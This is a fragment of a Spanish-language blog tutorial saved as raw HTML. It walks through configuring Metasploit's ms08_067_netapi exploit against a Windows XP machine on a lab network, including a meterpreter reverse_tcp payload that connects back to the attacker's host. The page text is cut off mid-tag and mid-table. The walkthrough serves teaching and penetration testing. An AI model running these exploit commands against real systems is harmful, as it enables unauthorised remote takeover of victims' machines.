Академический Документы
Профессиональный Документы
Культура Документы
DOCTYPE html>
<!--[if IE 6]>
<html id="ie6" lang="en-US">
<![endif]-->
<!--[if IE 7]>
<html id="ie7" lang="en-US">
<![endif]-->
<!--[if IE 8]>
<html id="ie8" lang="en-US">
<![endif]-->
<!--[if !(IE 6) | !(IE 7) | !(IE 8) ]><!-->
<html lang="en-US"><!--<![endif]--><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<title>Tomar control remoto de una mquina Windows XP / 2003 con Metasploit | Redi
nSkala</title>
<link rel="profile" href="http://gmpg.org/xfn/11">
<link rel="stylesheet" type="text/css" media="all" href="Tomar%20control%20remot
o%20de%20una%20m%C3%A1quina%20Windows%20XP%20_%202003%20con%20Metasploit%20%7C%2
0RedinSkala_files/style.css">
<link rel="pingback" href="http://www.redinskala.com/xmlrpc.php">
<!--[if lt IE 9]>
<script src="http://www.redinskala.com/wp-content/themes/twentyeleven/js/html5.j
s" type="text/javascript"></script>
<![endif]-->
<link rel="alternate" type="application/rss+xml" title="RedinSkala Feed" href="h
ttp://www.redinskala.com/feed/">
<link rel="alternate" type="application/rss+xml" title="RedinSkala Comments Feed
" href="http://www.redinskala.com/comments/feed/">
<link rel="alternate" type="application/rss+xml" title="RedinSkala Tomar control
remoto de una mquina Windows XP / 2003 con Metasploit Comments Feed" href="http:
//www.redinskala.com/2013/04/08/tomar-control-remoto-de-una-maquina-windows-xp-2
003-con-metasploit/feed/">
<link rel="stylesheet" id="dark-css" href="Tomar%20control%20remoto%20de%20una%2
0m%C3%A1quina%20Windows%20XP%20_%202003%20con%20Metasploit%20%7C%20RedinSkala_fi
les/dark.css" type="text/css" media="all">
<script type="text/javascript" src="Tomar%20control%20remoto%20de%20una%20m%C3%A
1quina%20Windows%20XP%20_%202003%20con%20Metasploit%20%7C%20RedinSkala_files/com
ment-reply.js"></script>
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.redi
nskala.com/xmlrpc.php?rsd">
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.redi
nskala.com/wp-includes/wlwmanifest.xml">
<link rel="prev" title="IMSVA retraso en la entrega de correo (cleanup muy alto)
" href="http://www.redinskala.com/2013/03/26/imsva-retraso-en-la-entrega-de-corr
eo-cleanup-muy-alto/">
<link rel="next" title="Instalacin de Solaris 10 en VMWare Workstation" href="htt
p://www.redinskala.com/2013/04/11/instalacion-de-solaris-10-en-vmware-workstatio
n/">
<meta name="generator" content="WordPress 3.5">
<link rel="canonical" href="http://www.redinskala.com/2013/04/08/tomar-control-r
emoto-de-una-maquina-windows-xp-2003-con-metasploit/">
<link rel="shortlink" href="http://www.redinskala.com/?p=382">
<style>
/* Link color */
a,
#site-title a:focus,
#site-title a:hover,
#site-title a:active,
.entry-title a:hover,
.entry-title a:focus,
.entry-title a:active,
.widget_twentyeleven_ephemera .comments-link a:hover,
section.recent-posts .other-recent-posts a[rel="bookmark"]:hover
,
section.recent-posts .other-recent-posts .comments-link a:hover,
.format-image footer.entry-meta a:hover,
#site-generator a:hover {
color: #2870a7;
}
section.recent-posts .other-recent-posts .comments-link a:hover
{
border-color: #2870a7;
}
article.feature-image.small .entry-summary p a:hover,
.entry-header .comments-link a:hover,
.entry-header .comments-link a:focus,
.entry-header .comments-link a:active,
.feature-slider a.active {
background-color: #2870a7;
}
</style>
<style type="text/css">
#site-title,
#site-description {
position: absolute !important;
clip: rect(1px 1px 1px 1px); /* IE6, IE7 */
clip: rect(1px, 1px, 1px, 1px);
}
</style>
<style type="text/css" id="custom-background-css">
body.custom-background { background-color: #3e3e3e; }
</style>
</head>
<body class="single single-post postid-382 single-format-standard custom-backgro
und two-column left-sidebar">
<div id="page" class="hfeed">
<header id="branding" role="banner">
<hgroup>
<h1 id="site-title"><span><a href="http://www.re
dinskala.com/" title="RedinSkala" rel="home">RedinSkala</a></span></h1>
<h2 id="site-description">Porque todo tiene una
respuesta</h2>
</hgroup>
<a href="http://www.redinskala.c
om/">
<img src
="Tomar%20control%20remoto%20de%20una%20m%C3%A1quina%20Windows%20XP%20_%202003%2
0con%20Metasploit%20%7C%20RedinSkala_files/RS12.jpg" alt="" height="288" width="
1000">
</a>
<nav id="access" role="navigation">
<h3 class="assistive-text">Main menu</h3>
<div class="skip
-link"><a class="assistive-text" href="#content" title="Skip to primary content"
dos valores.</p>
<p>Para configurar la IP de la mquina XP que vamos a atacar, ejecutamos el siguie
nte comando:</p>
<pre>msf exploit(ms08_067_netapi) > set RHOST 192.168.75.90
RHOST => 192.168.75.90</pre>
<p><em> Donde 192.168.75.90 corresponde a la IP de la vctima</em></p>
<p>La seccin Exploit target indica a qu plataformas se mandar este
exploit. Si ejecutamos el siguiente comando podemos ver todas las
plataformas que son vulnerables con este exploit:</p>
<pre>msf exploit(ms08_067_netapi) > show targets
Exploit targets:
Id Name
-- ---0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (AlwaysOn NX)</pre>
<p>Observamos que la opcin actual 0 indica una identificacin
automtica de la plataforma, esta opcin es suficiente y no es necesario
modificarla. Si se desea cambiar podemos hacerlo con el siguiente
comando:</p>
<pre>msf exploit(ms08_067_netapi) > set target 1
target => 1</pre>
<p>Por ltimo debemos configurar el payload de nuestro exploit, esto no
es ms que indicarle a Mestasploit que una vez que la vulnerabilidad sea
explotada en el equipo vctima, debe ejecutar cierta aplicacin para
que podamos tomar control remoto de la mquina. Esta configuracin la
agregamos con la siguiente opcin:</p>
<pre>msf exploit(ms08_067_netapi) > set payload windows/meterpreter/rev
erse_tcp
payload => windows/meterpreter/reverse_tcp</pre>
<p>El payload reverse_tcp ejecuta un cliente reverso en la mquina XP,
dicho cliente se conectar hacia nuestro Metasploit por el puerto por
defecto 4444. Este payload es el que finalmente nos permitir tomar
control del equipo vctima. Ahora para indicarle a este cliente que se
conecte a nuestro Metasploit, debemos ejecutar el siguiente comando:</p>
<pre>msf exploit(ms08_067_netapi) > set LHOST 192.168.75.35
LHOST => 192.168.75.35</pre>
<p><em>Donde 192.168.75.35 corresponde a la IP de la mquina donde estamos ejecuta
ndo el Metasploit</em></p>
<p>Con esta configuracin estamos listos para inciar el ataque a la
vctima XP. Si ejecutamos una ltima vez el comando show options
veremos cmo qued la configuracin de nuestro exploit:</p>
<pre>msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- -------------- -------- ----------RHOST 192.168.75.90 yes &nb
sp; The target address
RPORT 445  
; yes Set the SMB service
port
SMBPIPE BROWSER yes&
nbsp; The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Descript
ion
---- --------------- -------- --------
h3>
<ul>
<li>
<a href="http://www.redinskala.com/2014/03/11/im
sva-puede-parecer-un-open-relay/" title="IMSVA puede parecer un Open-Relay">IMSV
A puede parecer un Open-Relay</a>
</li>
<li>
<a href="http://www.redinskala.com/2013/10/30/in
tegracion-de-imsva-a-multiples-ldap/" title="Integracin de IMSVA a mltiples LDAP">
Integracin de IMSVA a mltiples LDAP</a>
</li>
<li>
<a href="http://www.redinskala.com/2013/10/29/ha
bilitar-spf-en-imsva/" title="Habilitar y configurar SPF en IMSVA">Habilitar y c
onfigurar SPF en IMSVA</a>
</li>
<li>
<a href="http://www.redinskala.com/2013/10/18/co
mo-funciona-tls/" title="Cmo funciona TLS?">Cmo funciona TLS?</a>
</li>
<li>
<a href="http://www.redinskala.com/2013/10/11/co
mo-encontrar-el-ep/" title="Cmo encontrar el Entry Point (EP) en Memoria y Disco"
>Cmo encontrar el Entry Point (EP) en Memoria y Disco</a>
</li>
<li>
<a href="http://www.redinskala.com/2013/10/11/el
-formato-pe-parte-ii/" title="El Formato PE (Portable Executable) Parte II">El F
ormato PE (Portable Executable) Parte II</a>
</li>
<li>
<a href="http://www.redinskala.com/2013/10/11/an
alisis-421-error-timeout-exceeded/" title="Anlisis de prdida de conexin | 421 4.4.2
host Error: timeout exceeded">Anlisis de prdida de conexin | 421 4.4.2 host Error:
timeout exceeded</a>
</li>
<li>
<a href="http://www.redinskala.com/2013/10/09/fo
rmato-pe-parte-i/" title="El Formato PE (Portable Executable) Parte I">El Format
o PE (Portable Executable) Parte I</a>
</li>
<li>
<a href="http://www.redinskala.com/2013/09/26/an
alisis-de-smtp-con-wireshark/" title="Anlisis de SMTP con Wireshark">Anlisis de SM
TP con Wireshark</a>
</li>
<li>
<a href="http://www.redinskala.com/2013/09/25/es
x-en-modo-promiscuo/" title="Configurar tarjetas de red de ESX en modo promiscuo
">Configurar tarjetas de red de ESX en modo promiscuo</a>
</li>
</ul>
</aside>
</div><!-- #secondary .widget-area -->
</div><!-- #main -->
<footer id="colophon" role="contentinfo">
<div id="site-generator">
<a href="http://
wordpress.org/" title="Semantic Personal Publishing Platform">RedinSkala. Todos
los derechos reservados. 2012</a>
</div>
</footer><!-- #colophon -->
</div><!-- #page -->
<script type="text/javascript" src="Tomar%20control%20remoto%20de%20una%20m%C3%A
1quina%20Windows%20XP%20_%202003%20con%20Metasploit%20%7C%20RedinSkala_files/dev
icepx-jetpack.js"></script>
</body></html>